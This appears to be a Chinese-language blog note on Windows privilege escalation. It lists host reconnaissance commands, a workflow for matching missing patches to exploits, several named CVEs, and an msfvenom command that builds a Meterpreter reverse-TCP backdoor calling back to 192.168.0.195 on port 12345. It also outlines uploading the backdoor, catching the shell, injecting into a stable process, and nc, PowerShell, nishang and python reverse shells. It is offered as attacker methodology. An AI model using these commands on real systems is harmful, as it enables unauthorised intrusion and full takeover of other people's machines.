20 windows提权 01
提权常用方法
windows的常用提权方法,主要分为漏洞提权、windwos特性提权、第三方组件提权,数据库提权 ftp提权 等。
systeminfo | findstr OS #获取系统版本信息 systeminfo&&wmic product get name,version&&wmic nic where PhysicalAdapter=True get MACAddress,Name&&wmic NICCONFIG WHERE IPEnabled=true GET IPAddress #检测系统软件包 hostname #获取主机名称 whoami /all #获取当前用户的详细信息 whoami /priv #显示当前用户的安全特权 net start #查看服务 quser or query user #获取在线用户 netstat -ano | findstr 3389 #获取rdp连接来源IP dir c:\programdata\ #分析安装杀软 wmic qfe get Caption,Description,HotFixID,InstalledOn #列出已安装的补丁 REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber #获取远程端口 tasklist /svc | find "TermService" #获取服务pidt
提权流程
能够执行cmd命令->是否打补丁->补丁对应exp->获取服务器权限
补丁查询
hacking8在线查询
wesng查询
windowsvulnscan查询补丁
查询可写目录或文件
常用漏洞提权
cve-2016-3225
cve-2014-4113
cve-2020-0787(需要利用图形化界面,因为要弹窗)
metasplit提权
kali生成反向连接后门
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.195 lport=12345 -f exe >s.exeb把
把后门文件上传到可执行目录
在kali中用metasplit监听ip和端口
得到反弹shell
使用exploit检测可用的提权模块
将进程注入到稳定的进程中
反弹shell提权
nc反弹shell
powershell反弹cmd
nishang反弹shell
python反弹shell

浙公网安备 33010602011771号